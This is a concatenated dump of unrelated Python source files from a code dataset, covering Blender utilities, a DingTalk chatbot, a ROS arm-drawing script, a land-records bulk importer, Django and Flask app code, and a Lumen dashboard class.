matches = set()\n for coll in dir(bpy.data):\n if not isinstance(\n getattr(bpy.data, coll),\n bpy.types.bpy_prop_collection,\n ):\n continue\n for node in getattr(bpy.data, coll):\n for attr, value in attrs.items():\n avalon_prop = node.get(pipeline.AVALON_PROPERTY)\n if not avalon_prop:\n continue\n if (avalon_prop.get(attr)\n and (value is None or avalon_prop.get(attr) == value)):\n matches.add(node)\n return list(matches)\n\n\ndef read(node: bpy.types.bpy_struct_meta_idprop):\n \"\"\"Return user-defined attributes from `node`\"\"\"\n\n data = dict(node.get(pipeline.AVALON_PROPERTY))\n\n # Ignore hidden/internal data\n data = {\n key: value\n for key, value in data.items() if not key.startswith(\"_\")\n }\n\n return data\n\n\ndef get_selection() -> List[bpy.types.Object]:\n \"\"\"Return the selected objects from the current scene.\"\"\"\n return [obj for obj in bpy.context.scene.objects if obj.select_get()]\n\n\n@contextlib.contextmanager\ndef maintained_selection():\n r\"\"\"Maintain selection during context\n\n Example:\n >>> with maintained_selection():\n ... # Modify selection\n ... bpy.ops.object.select_all(action='DESELECT')\n >>> # Selection restored\n \"\"\"\n\n previous_selection = get_selection()\n previous_active = bpy.context.view_layer.objects.active\n try:\n yield\n finally:\n # Clear the selection\n for node in get_selection():\n node.select_set(state=False)\n if previous_selection:\n for node in previous_selection:\n try:\n node.select_set(state=True)\n except ReferenceError:\n # This could happen if a selected node was deleted during\n # the context.\n logger.exception(\"Failed to reselect\")\n continue\n try:\n bpy.context.view_layer.objects.active = previous_active\n except ReferenceError:\n # This could happen if the active node was deleted during the\n # context.\n logger.exception(\"Failed to set active object.\")\n","sub_path":"avalon/blender/lib.py","file_name":"lib.py","file_ext":"py","file_size_in_byte":4538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"1662552","text":"import requests \nimport time \nfrom .logger_setting import logger \n\n\n\n# Defining ChatBot specific Class to send messages to Dingtalk \n\nclass ChatBot: \n\n def send_markdown(self, payload, access_token, retry_time = 0, buffering = 5): \n\n \"\"\"\n Sending markdown content in payload to Dingtalk\n\n Parameters\n ----------\n payload : dict\n the information to be sent \n access_token : str\n the token of the DingTalk ChatBot that is given when generating the ChatBot\n example is https://oapi.dingtalk.com/robot/send?access_token={} \n the string behind the \"access_token\" is what to be input here\n retry_time : int\n number of times to retry sending the message \n buffering : int \n the number of seconds waiting between retries \n\n Returns\n -------\n bool\n True if successful\n \n Raises\n ------\n RuntimeError\n if failed to send message \n\n Examples\n --------\n\n \"\"\"\n\n url = \"https://oapi.dingtalk.com/robot/send?access_token=\" + str(access_token) \n headers = {\"Content-Type\": \"application/json;charset=utf-8\"}\n\n attempt = 0 \n\n while attempt == 0 or attempt < retry_time:\n logger.info(\"Sending to Dingtalk .....\")\n\n r = requests.post(url, headers = headers, json = payload) \n\n if (r.text == \"\"\"{\"errcode\":0,\"errmsg\":\"ok\"}\"\"\" or r.text == \"\"\"{\"errmsg\":\"ok\",\"errcode\":0}\"\"\"): \n logger.info(\"Message is sent.\")\n return True \n\n else: \n attempt += 1\n logger.error(\"Attempt {}. {}. Retrying .....\".format(attempt, r.text)) \n time.sleep(buffering)\n continue \n \n raise RuntimeError(\"Cannnot send message due to: %s\" % r.text) \n\n\n\n def send2ding(self, title, message, access_token, retry_time = 3, buffering = 5):\n\n \"\"\"\n Generate payload from inputs to attach with the message and send out to DingTalk\n using send_markdown()\n\n Parameters\n ----------\n title : str\n title of the message \n message : str\n content of the message \n access_token : string\n the token of the DingTalk ChatBot that is given when generating the ChatBot\n example is https://oapi.dingtalk.com/robot/send?access_token={} \n the string behind the \"access_token\" is what to be input here \n retry_time : int\n number of times to retry sending the message \n buffering : int \n the number of seconds waiting between retries \n\n Returns\n -------\n bool\n True if successful\n\n Raises\n ------\n RuntimeError\n if failed to send message \n\n Examples\n --------\n \n \"\"\"\n\n payload = {\n \"msgtype\": \"markdown\",\n \"markdown\": {\n \"title\": title,\n \"text\": message \n }, \n \"at\": {}\n }\n\n self.send_markdown(payload = payload, access_token = access_token, retry_time = retry_time, buffering = buffering) \n","sub_path":"pyool/chatbot.py","file_name":"chatbot.py","file_ext":"py","file_size_in_byte":3249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"135051084","text":"#!/usr/bin/env python\n\nimport sys\nimport copy\nimport rospy\nimport moveit_commander\nimport moveit_msgs.msg\nimport geometry_msgs.msg\nfrom geometry_msgs.msg import Point\nfrom visualization_msgs.msg import Marker\nfrom visualization_msgs.msg import MarkerArray\nimport math\nimport rosbag\n\nclass Line_Marker(object):\n def __init__(self, marker_topic, queue_size, orien_w, orien_x, orien_y, orien_z, pos_x, pos_y, pos_z):\n self._marker_topic = marker_topic\n self._publisher = rospy.Publisher(self._marker_topic, Marker, queue_size=queue_size)\n\n self._marker = Marker()\n self._marker.lifetime = rospy.Duration()\n self._marker.header.frame_id = \"/base_link\"\n self._marker.type = self._marker.LINE_STRIP\n self._marker.action = self._marker.ADD\n self._marker.scale.x = 0.05\n self._marker.color.a = 1.0\n self._marker.color.r = 0.0\n self._marker.color.g = 1.0\n self._marker.color.b = 0.0\n self._marker.pose.orientation.w = orien_w\n self._marker.pose.orientation.x = orien_x\n self._marker.pose.orientation.y = orien_y\n self._marker.pose.orientation.z = orien_z\n self._marker.pose.position.x = pos_x\n self._marker.pose.position.y = pos_y\n self._marker.pose.position.z = pos_z\n self._marker.points = []\n\n def add_new_point(self, x, y, z):\n pt = Point()\n pt.x = x\n pt.y = y\n pt.z = z\n self._marker.points.append(pt)\n\n def get_marker_ptr(self):\n return self._marker\n\n def publish_marker(self):\n rospy.sleep(20)\n print(\"publishing line marker ...\")\n self._publisher.publish(self._marker)\n\n def write_to_rosbag(self, bag_name):\n print(\"writing marker to rosbag (circle)...\")\n bag = rosbag.Bag(bag_name, 'w')\n try:\n bag.write(self._marker_topic, self._marker, rospy.Time.now())\n finally:\n bag.close()\n \n def read_from_rosbag_and_publish(self, bag_name):\n print(\"reading marker from rosbag (circle)...\")\n msg_from_bag = None\n marker_bag = rosbag.Bag(bag_name)\n # read all messages from the indicated topics:\n for topic, msg, t in marker_bag.read_messages(topics=[self._marker_topic]):\n if topic == self._marker_topic:\n msg_from_bag = msg\n self._publisher.publish(msg_from_bag)\n\n# initialise the moveit_commander module (which allows us to communicate with the MoveIt Rviz interface)\nmoveit_commander.roscpp_initialize(sys.argv)\nrospy.init_node('move_group_python_interface_1', anonymous=True)\n\n# create RobotCommander obj (an interface to our robot):\nrobot = moveit_commander.RobotCommander()\n# create PlanningSceneInterface obj (an interface to the world that surrounds the robot):\nscene = moveit_commander.PlanningSceneInterface()\n# create MoveGroupCommander obj to allow us to interact with the 'manipulator' set of joints:\ngroup = moveit_commander.MoveGroupCommander(\"manipulator\")\n# create tomath.pic publisher to allow MoveIt Rviz to visualise our planned motion:\ndisplay_trajectory_publisher = rospy.Publisher('/move_group/display_planned_path', \n moveit_msgs.msg.DisplayTrajectory, \n queue_size=20)\n\nmarker_topic = 'visualization_marker'\nline_marker = Line_Marker(marker_topic=marker_topic, orien_w=1.0, \n orien_x=0, orien_y=0, orien_z=0, pos_x=0, \n pos_y=0, pos_z=0, queue_size=10)\n\n# set joints to home position first:\nprint(\"bringing robot to home position ...\")\njoint_goal = group.get_current_joint_values()\njoint_goal[0] = 0\njoint_goal[1] = -math.pi/2\njoint_goal[2] = math.pi/2\njoint_goal[3] = -math.pi/2\njoint_goal[4] = -math.pi/2\njoint_goal[5] = 0\ngroup.go(joint_goal, wait=True)\ngroup.stop()\n\n\n# draw a circle:\nwaypoints = []\nscale = 1.5\nwpose = group.get_current_pose().pose\nx_center = wpose.position.x\ny_center = wpose.position.y\nradius = 0.2\n\n# 1st move down onto drawing plane:\nwpose.position.z -= scale * 0.2\nwpose.position.x += radius # move from centre to one end of the circle\nwaypoints.append(copy.deepcopy(wpose))\nline_marker.add_new_point(wpose.position.x, wpose.position.y, wpose.position.z)\n\nprint(\"generating points along circumference ...\")\n# tolerances required to execute this is beyond capabilities of controller!\n# find a way for ur5 to draw curves \nfor i in range(360/2): \n theta = i*math.pi/(180/2) # rad\n wpose.position.x = x_center + radius*math.cos(theta)\n wpose.position.y = y_center + radius*math.sin(theta)\n waypoints.append(copy.deepcopy(wpose))\n line_marker.add_new_point(wpose.position.x, wpose.position.y, wpose.position.z)\n \n\n# 5th move away from drawing plane:\nwpose.position.z += scale * 0.2 # 6th move down (z)\nwpose.position.x -= radius # move from other end of circle back to centre\nwaypoints.append(copy.deepcopy(wpose))\n\n\n# Here we want cartesian path to be interpolated at a resoltion of 1cm, \n# hence eef_step=0.01 in cartesian translation.\n# Here we ignore checks for infeasible jumps in joint space\n(plan, fraction) = group.compute_cartesian_path( \n waypoints=waypoints, # waypoints to follow\n eef_step=0.01, # eef_step\n jump_threshold=0.0) # jump_threshold\n\ndisplay_trajectory = moveit_msgs.msg.DisplayTrajectory()\ndisplay_trajectory.trajectory_start = robot.get_current_state()\ndisplay_trajectory.trajectory.append(plan)\n# publish:\ndisplay_trajectory_publisher.publish(display_trajectory)\n\n'''\n## ONLY USE THE BELOW CODE WHEN RUNNING .PY WITHIN SCRIPS DIRECTORY! \n# (env in shbang does not have the necessary bag_msg_ folders)\n## --- ROSBAG CODE (WRITE): ----\nprint(\"writing trajectory to rosbag (circle)...\")\nbag = rosbag.Bag('bag_msgs_circle/display_trajectory_circle.bag', 'w')\ntry:\n bag.write('/move_group/display_planned_path', display_trajectory, rospy.Time.now())\nfinally:\n bag.close()\n## --- ROSBAG CODE (READ): do not run at same time with rosbag write code! ---\nprint(\"reading trajectory from rosbag (circle)...\")\nmsg_from_bag = None\ncircle_bag = rosbag.Bag('bag_msgs_circle/display_trajectory_circle.bag')\n# read all messages from the indicated topics:\nfor topic, msg, t in circle_bag.read_messages(topics=['/move_group/display_planned_path']):\n if topic == '/move_group/display_planned_path':\n msg_from_bag = msg\ndisplay_trajectory_publisher.publish(msg_from_bag)\n'''\n\nprint(\"drawing shape trajectory ...\")\nline_marker.publish_marker()\n'''\n## ONLY USE THE BELOW CODE WHEN RUNNING .PY WITHIN SCRIPS DIRECTORY!\n# (env in shbang does not have the necessary bag_msg_ folders)\nline_marker.write_to_rosbag('bag_msgs_circle/marker_bag_circle.bag')\nline_marker.read_from_rosbag_and_publish('bag_msgs_circle/marker_bag_circle.bag')\n'''\n\nprint(\"executing plan ...\")\ngroup.execute(plan, wait=True)\n\nrospy.sleep(5)\n\nprint(\"finished, going to sleep now\")\nmoveit_commander.roscpp_shutdown()\n\n","sub_path":"my_motion_scripts/scripts/planning_script_circle.py","file_name":"planning_script_circle.py","file_ext":"py","file_size_in_byte":7075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"92027173","text":"import csv\nimport json\nimport requests\nimport getpass\n\n# ===================================== set up your account ============================================\n\nbase = 'https://{platform}.cadasta.org/'\nplatform = 'demo'\norganization_slug = '{organization_name}'\nproject_slug = '{project_name}'\nfilePath = '{file_path}'\nname = '{username}'\n# explain how to use getpass\npw = getpass.getpass('Enter your password')\n\n# ===================================== get access token ============================================\nresp = requests.post('https://platform-staging.cadasta.org/api/v1/account/login/', {'username': name, 'password': pw})\ntoken = resp.json()['auth_token']\nheaders = {'Authorization': 'token ' + token}\n\n# ===================================== open csv file ============================================\nwith open(filePath,'rU') as csvfile:\n reader = csv.DictReader(csvfile)\n for row in reader:\n # ================================ party fields and resources =================================\n partyAttributes = {\n \"name\": row['party_name'],\n \"type\": row['party_type'],\n \"attributes\":{\n \"party_religion\": row['party_religion'],\n \"party_caste_cert\": row['party_caste_cert'],\n \"party_category\": row['party_category'],\n }\n }\n partyUrl = '{base}/api/v1/organizations/{organization_slug}/projects/{project_slug}' + project + '/parties/'\n partyResp = requests.post(partyUrl, json=partyAttributes, headers=headers)\n 'Party ::' + partyResp.raise_for_status()\n 'Party ::' + partyResp.json()\n partyId = partyResp.json()['id']\n\n partyResource = {\n \"name\": row['party_name'],\n \"description\": \"\",\n \"original_file\": row['party_resource_photo'],\n \"file\": \"https://s3-us-west-2.amazonaws.com/cadasta-platformprod-bucket/resources/\" + row['party_resource_photo']\n }\n partyResourceUrl = '{base}/api/v1/organizations/{organization_slug}/projects/{project_slug}' + project + '/parties/' + partyId + '/resources/'\n partyResourceResponse = requests.post(partyResourceUrl, json=partyResource, headers=headers)\n 'Party Resource ::' + partyResourceResponse.status_code\n 'Party Resource ::' + partyResourceResponse.json()\n\n # ================================ location fields and resources =================================\n geom = '{\"type\":\"'+ row[\"geo_type\"] + '\",\"coordinates\": '+ row[\"location_geometry\"]+ '}'\n locationAttributes = {\n \"type\":\"Feature\",\n \"geometry\": geom,\n \"properties\":{\n \"type\": row['location_type'],\n \"attributes\":{\n \"cook_day\": row['cook_day'],\n \"water_buy\": row['water_buy'],\n \"drainline\": row['drainline'],\n \"location_slumname\": row['location_slumname'],\n \"location_city_ward\": row['location_city_ward'],\n \"toilet_paid\": row['toilet_paid']\n }\n }\n }\n\n locationUrl = '{base}/api/v1/organizations/{organization_slug}/projects/{project_slug}' + project + '/spatial/'\n locationResp = requests.post(locationUrl, json=locationAttributes, headers=headers)\n 'Location ::' + locationResp.status_code\n 'Location ::' + locationResp.json()\n locationId = locationRequest.json()['properties']['id']\n\n locationResource = {\n \"name\": row['party_name'],\n \"description\": \"\",\n \"original_file\": row['location_resource_photo'],\n \"file\": \"https://s3-us-west-2.amazonaws.com/cadasta-platformprod-bucket/resources/\" + row['location_resource_photo']\n }\n\n locationResourceUrl = '{base}/api/v1/organizations/{organization_slug}/projects/{project_slug}' + project + '/spatial/' + locationId + '/resources/'\n locationResourceResp = requests.post(locationUrl, data=json.dumps(locationResource), headers=headers)\n 'Location Resource ::' + locationResourceResp.status_code\n 'Location Resource ::' + locationResourceResp.json()\n\n # ================================ tenure fields and resources =================================\n tenureAttributes = {\n \"tenure_type\": row['tenure_type'],\n \"party\": partyId,\n \"spatial_unit\": locationId,\n \"attributes\":{\n \"residential_status\": row['residential_status'],\n \"occupancy_type\": row['occupancy_type'],\n \"land_own_notes\": row['land_own_notes']\n }\n }\n\n tenureUrl = '{base}/api/v1/organizations/{organization_slug}/projects/{project_slug}/relationships/tenure/'\n tenureResp = requests.post(tenureUrl, json=tenureAttributes, headers=headers)\n 'Tenure Resource ::' + tenureResp.status_code\n 'Tenure Resource ::' + tenureResp.json()\n tenureId = tenureResp.json()['id']\n\n tenureResource = {\n \"name\": row['party_name'],\n \"description\": \"\",\n \"file\": \"https://s3-us-west-2.amazonaws.com/cadasta-platformprod-bucket/resources/\" + row['tenure_resource_photo']\n }\n\n tenureUrl = '{base}/api/v1/organizations/{organization_slug}/projects/{project_slug}/relationships/tenure/' + tenureId + '/resources/'\n tenureResp = requests.post(tenureUrl, json=tenureAttributes, headers=headers)\n 'Tenure Resource ::' + tenureResp.status_code\n 'Tenure Resource ::' + tenureResp.json()\n","sub_path":"bulk-import/all-endpoints/all-endpoint-script.py","file_name":"all-endpoint-script.py","file_ext":"py","file_size_in_byte":5179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"57957234","text":"from flask import make_response\nimport json\n\nbaseURL = \"http://youlanedu.com/api/backendManage/\"\nOrigin = 'http://localhost:7050'\n\nretModel = {\n \"code\": 0,\n \"msg\": \"\",\n \"data\": {},\n}\n\ndef makeRespose(res, code=200):\n tmp = make_response(json.dumps(res))\n return tmp, code\n","sub_path":"conf/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"11704635","text":"\"\"\"Doc.\"\"\"\nimport os\nimport time\nimport json\nimport logging\nfrom subprocess import Popen\nfrom werkzeug.utils import secure_filename\n\nfrom utils import read_csv\nfrom storage_factory import ds, fs, put_result, get_result\n\n\nMODEL_LIST = 'zero linear tree forest'.split()\n\n\nclass Processor:\n\n def __init__(self):\n pass\n\n def get_file(self, user_id):\n try:\n return ds.get('file', user_id)\n except FileNotFoundError:\n return {'filename': \"No file yest, please upload one\"}\n\n def upload(self, user_id, file):\n source_filename = secure_filename(file.filename)\n filename = '-'.join(['data', user_id, source_filename])\n ds.put('file', user_id, {'filename': filename, 'source_filename': source_filename})\n fs.save(filename, file)\n path = fs.get_path(filename)\n vl = []\n message = \"{}\"\n try:\n df = read_csv(path)\n for c in df.columns:\n vl.append(c + 'p')\n self.set_target(user_id, {'target':','.join(vl)})\n except Exception as e:\n logging.warning(e)\n message = \"Failed to parse {}\" \n fs.delete(filename)\n ds.delete('file', user_id)\n return json.dumps({'name': message.format(source_filename)})\n\n def get_target(self, user_id):\n r = ds.get('target', user_id)\n return r\n\n def set_target(self, user_id, t):\n ds.put('target', user_id, t)\n return None\n\n def _run_job(self, user_id, model):\n logging.info('run {}'.format(model))\n put_result(model, user_id, 'running', 'starting...')\n cmd = \"python automl_run.py {} {}\".format(user_id, model)\n # fname_out = \"{}/run-{}-{}.log\".format(LOG_FOLDER, user_id, model)\n # with open(fname_out, \"wb\") as out:\n job = Popen(cmd, shell=True)\n logging.debug('rcode {}'.format(job.returncode))\n \n def run_job(self, user_id, job):\n for m in MODEL_LIST:\n self._run_job(user_id, m)\n return self.get_result(user_id)\n \n def get_result(self, user_id):\n\n def getr(m):\n return get_result(m, user_id)\n\n r = list(map(getr , MODEL_LIST))\n j = {}\n for m, rr in zip(MODEL_LIST, r):\n j[m] = rr\n \n sd = ds.get('score_desc', user_id)\n j['score_desc'] = sd['score_desc'] if sd else 'Result'\n return j\n","sub_path":"app_processor.py","file_name":"app_processor.py","file_ext":"py","file_size_in_byte":2431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"31039577","text":"from django.shortcuts import render\nfrom user_interface.forms import Form\nfrom user_interface.inputHandling import cleanUp\nfrom user_interface import setsOperations\n\n\ndef index(request):\n context = {}\n if request.method == \"POST\":\n context['display'] = 'false'\n form = Form(request.POST)\n set1 = cleanUp(request.POST['set1'])\n set2 = cleanUp(request.POST['set2'])\n choice = request.POST['choice']\n if 'venn_diagram' in request.POST:\n generateVennDiagram = True\n else:\n generateVennDiagram = False\n if choice == 'union':\n context['return_set'] = set1.union(set2)\n elif choice == 'intersection':\n context['return_set'] = set1.intersection(set2)\n elif choice == 'difference':\n context['return_set'] = set1.difference(set2)\n elif choice == 'subset':\n context['return_set'] = setsOperations.subset_checker(set1, set2)\n elif choice == 'cartesian':\n context['return_set'] = setsOperations.cartesian_product(set1, set2)\n elif choice == 'member':\n user_input = request.POST['user_input']\n try:\n user_input = int(user_input)\n print(set1, set2, user_input)\n context['return_set'] = setsOperations.membership(set1, set2, user_input)\n except:\n context['return_set'] = \"Invalid input for the membership operation\"\n if generateVennDiagram:\n setsOperations.venn_diagram_generator(set1, set2, setsOperations.membership(set1, set2, choice), choice)\n context['display_diagram'] = 'true'\n else:\n context['display_diagram'] = 'false'\n else:\n form = Form()\n context['form'] = Form()\n context['display'] = 'true'\n return render(request, 'index.html', context)\n","sub_path":"sets/user_interface/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"130698679","text":"from django.conf.urls import patterns, include, url\nfrom django.views.generic import TemplateView\nfrom fotos.views import *\nfrom videos.views import *\nfrom website_content.views import *\nfrom noticias.views import *\nfrom links.views import *\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n url(r'^admin/', include(admin.site.urls)),\n url(r'^grappelli/', include('grappelli.urls')),\n url(r'^cursos/accounts/', include('allauth.urls')),\n\n # Landing Base Page\n url(r'^$', TemplateView.as_view(template_name='index.html'), name='index'),\n\n # Elearning App\n #url(r'^cursos/$', TemplateView.as_view(template_name='cursos/index.html'), name='cursos'),\n url(r'^cursos/$', 'autoresponse.views.autoresponse', name='cursos'),\n\n # Portuguese\n url(r'^dra.froes-clinica/$', 'curriculum.views.curriculum', name='index_clinica'),\n url(r'^dra.froes-clinica/clinica/$', CategoriasList.as_view(template_name=\"br/clinica.html\"), name='clinica_clinica'),\n url(r'^dra.froes-clinica/publicacoes/(?P\\D+)$', 'publicaciones.views.publicacoes', name='publicaciones'),\n url(r'^dra.froes-clinica/links/$', LinksView.as_view(), name='links'),\n url(r'^dra.froes-clinica/videos/$', 'videos.views.videos', name='videos'),\n url(r'^dra.froes-clinica/agenda/$', 'fotos.views.fotos', name='agenda'),\n url(r'^dra.froes-clinica/cadastro/$', 'cadastro.views.cadastro', name='cadastro'),\n url(r'^dra.froes-clinica/noticias/$', NoticiasList.as_view(), name='noticias'),\n url(r'^dra.froes-clinica/contato/$', 'contact_form.views.contato', name='contacto'),\n\n # English\n url(r'^en/dra.froes-clinic/$', 'curriculum.views.curriculum_en', name='index_clinica_en'),\n url(r'^en/dra.froes-clinic/biofisio_office/$', CategoriasList.as_view(template_name=\"en/clinica.html\"), name='clinica_clinica_en'),\n url(r'^en/dra.froes-clinic/publications/(?P\\D+)$', 'publicaciones.views.publications', name='publicaciones_en'),\n url(r'^en/dra.froes-clinic/links/$', LinksEnView.as_view(), name='links_en'),\n url(r'^en/dra.froes-clinic/videos/$', 'videos.views.videos_en', name='videos_en'),\n url(r'^en/dra.froes-clinic/agenda/$', 'fotos.views.fotos_en', name='agenda_en'),\n url(r'^en/dra.froes-clinic/news/$', NewsList.as_view(), name='noticias_en'),\n url(r'^en/dra.froes-clinic/contact_us/$', 'contact_form.views.contact', name='contacto_en'),\n\n # Spanish\n url(r'^es/dra.froes-clinica/$', 'curriculum.views.curriculum_en', name='index_clinica_es'),\n url(r'^es/dra.froes-clinica/clinica/$', CategoriasList.as_view(template_name=\"es/clinica.html\"), name='clinica_clinica_es'),\n url(r'^es/dra.froes-clinica/publicaciones/(?P\\D+)$', 'publicaciones.views.publicaciones', name='publicaciones_es'),\n url(r'^es/dra.froes-clinica/links/$', LinksEsView.as_view(), name='links_es'),\n url(r'^es/dra.froes-clinica/videos/$', 'videos.views.videos_es', name='videos_es'),\n url(r'^es/dra.froes-clinica/agenda/$', 'fotos.views.fotos_es', name='agenda_es'),\n url(r'^es/dra.froes-clinica/noticias/$', NoticiasEsList.as_view(), name='noticias_es'),\n url(r'^es/dra.froes-clinica/contacto/$', 'contact_form.views.contacto', name='contacto_es'),\n)\n","sub_path":"clinica/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"5038738","text":"from gensim.models import KeyedVectors\n\ndef relevance(w):\n try:\n model = KeyedVectors.load_word2vec_format('TabelogAdd.vec.pt', binary=True)\n food = w\n results = model.most_similar(positive = [food,'食べ物'])\n food_list = [results[0][0],results[1][0],results[2][0],results[3][0],results[4][0],results[5][0],results[6][0],results[7][0],results[8][0],results[9][0]]\n similar_list = [results[0][1],results[1][1],results[2][1],results[3][1],results[4][1],results[5][1],results[6][1],results[7][1],results[8][1],results[9][1]]\n return food_list,similar_list,0\n\n except KeyError as e:\n print('error:コーパスにありません')\n return e,1\n\n except FileNotFoundError as e:\n print('error:モデルが見つかりません')\n return e,2\n\nif __name__ == \"__main__\":\n word='ラーメン'\n print(relevance(word))","sub_path":"word2vec.py","file_name":"word2vec.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"454976516","text":"'''\n\nBy listing the first six prime numbers: 2, 3, 5, 7, 11, and 13, we can see that the 6th prime is 13.\n\nWhat is the 10,001st prime number?\n\n'''\n\n\n'''\n the smallest factor of any number, besides 1, is 2\n the largest possible factor of any number corresponds to this 2\n\n the largest possible factor of any number is half that number\n\n but we only need to try numbers from 2 to sqrt(n)\n'''\nimport math\n\ndef is_prime(n):\n '''\n Simplest way to tell if a number is prime is iterate through all the numbers from 2 to n-1 and check if n is divisble by i\n But the largest possible factor of a number is half that number, so we only need to iterate from 2 to n/2\n But this is still doing some extra work:\n Each of the factors larger than sqrt(n)\n corresponds to another factor less than sqrt(n)\n e.g. 2 corresponds to n/2\n we only need to check one of these factors, not both\n therefore we only need to iterate from 2 to sqrt(n)\n '''\n for i in range(2, n//2 + 1):\n if n % i == 0:\n return False\n '''\n for i in range(2, math.ceil(math.sqrt(n))):\n if n % i == 0:\n return False\n '''\n return True\n\n\ncount = 0\ni=2\nwhile count < 10001:\n\n if is_prime(i):\n count += 1\n\n i += 1\n\nprint(i-1)\n","sub_path":"7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"116497737","text":"import json\n\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\nfrom django.utils.decorators import method_decorator\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.views.generic import View\n\nfrom .models import CustomizedProduct, CustomizedField, EditableField\n\nimport logging\nlog = logging.getLogger(__name__)\n\n\nclass CreateCustomizedProduct(View):\n \"\"\"\n API method that takes a list of editable fields and their values \n \"\"\"\n @method_decorator(csrf_exempt)\n def dispatch(self, *args, **kwargs):\n return super(CreateCustomizedProduct, self).dispatch(*args, **kwargs)\n\n def post(self, request):\n response = dict(error=\"There was an error\")\n try:\n customized_fields = json.loads(request.body, None)\n except Exception as e:\n response['error'] = str(e)\n return HttpResponse(json.dumps(response), content_type=\"application/json\")\n\n customized_product = CustomizedProduct.objects.create()\n\n for customized_field in customized_fields:\n editable_field = EditableField.objects.get(id=customized_field['editable_field_id'])\n customized_field = CustomizedField.objects.create(\n customized_product=customized_product,\n editable_field=editable_field,\n content=customized_field['content'],\n )\n\n response[\"error\"] = False\n response[\"customized_product_id\"] = customized_product.id\n return HttpResponse(json.dumps(response), content_type=\"application/json\")\n","sub_path":"customized_product/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"158589802","text":"import os\nimport yaml\nimport panel as pn\nimport param, time\nfrom lumen.dashboard import Dashboard\nfrom lumen.filters import ConstantFilter, Filter, WidgetFilter # noqa\nfrom lumen.sources import Source, RESTSource # noqa\nfrom lumen import config\n\nfrom sudBoard.settings import BASE_DIR\nfrom vizApps.domain.Board import BoardEntity\n\nfrom vizApps.services.lumen.util import SpecYamlCreator, centerContent\n\ninstancesList = []\n\nclass LumenDashboard(param.Parameterized):\n\n specfile = param.FileSelector()\n reloader = pn.widgets.Button(name='=', width=10)\n config = param.Parameter(precedence=-1)\n specDoc = param.Parameter(precedence=-1)\n dashBoard = param.Parameter(precedence=-1)\n sentinelHackCounter = 0\n loading = False\n indicator = centerContent(pn.indicators.LoadingSpinner(value=True))\n\n\n @classmethod\n def getinstancesBySessionId(cls, sessionId):\n instances = [inst for inst in instancesList if inst._session == sessionId]\n if len(instances) >= 1:\n return instances\n return None\n\n @classmethod\n def clearInstancesForSession(cls, sessionId):\n instances = [inst for inst in instancesList if inst._session == sessionId]\n for i in instances:\n instancesList.remove(i)\n\n @classmethod\n def clearInstances(cls):\n instancesList.clear()\n\n def __init__(self, **kwargs):\n\n super(LumenDashboard, self).__init__(**kwargs)\n boardId=kwargs['board']\n self.board = BoardEntity.objects.get(id=boardId)\n self._session = kwargs.get('sessionId')+ str(boardId)\n self.josso_session_cookies = {'JOSSO_SESSIONID' : kwargs.get('JOSSO_SESSIONID')}\n self.specDoc = self.createSpecFromData()\n\n\n instancesList.append(self)\n\n def initializerCallback(self):\n print(f\"call initializerCallback; dashboard {self.dashBoard}\")\n\n if not self.dashBoard and not self.loading :\n self.sentinelHackCounter += 1\n print(f\"sentinel UP : {self.sentinelHackCounter}\")\n # premier lancement avec affichage d'un spinner car le server renvoi le document d'un seul tenant,\n # du coup le panel ne s'affiche pas tant que le Dashboard n'est pas totalement chargé!\n self.loading = True\n pn.state.add_periodic_callback(self.update, 700,count=1)\n\n def update(self):\n print(f\"call update; dashboard {self.dashBoard}; sentinel {self.sentinelHackCounter}\")\n\n tic = time.clock()\n if not self.dashBoard:\n try:\n self.dashBoard = Dashboard(specification=self.specDoc.name)\n toc = time.clock()\n print(f\"Time to create the dashboard {self.dashBoard.name} : {toc - tic}\")\n except(Exception) as e:\n self.dashBoard = pn.pane.HTML(object=f\"

Erreur dans la préparation du dashboard : {e}

\")\n print(e)\n else:\n self.dashBoard._yaml_file = self.specDoc.name\n self.dashBoard._load_specification(from_file=True)\n try:\n self.dashBoard._reload()\n except(Exception) as e:\n self.dashBoard = pn.pane.HTML(object=f\"

Erreur dans la préparation du dashboard : {e}

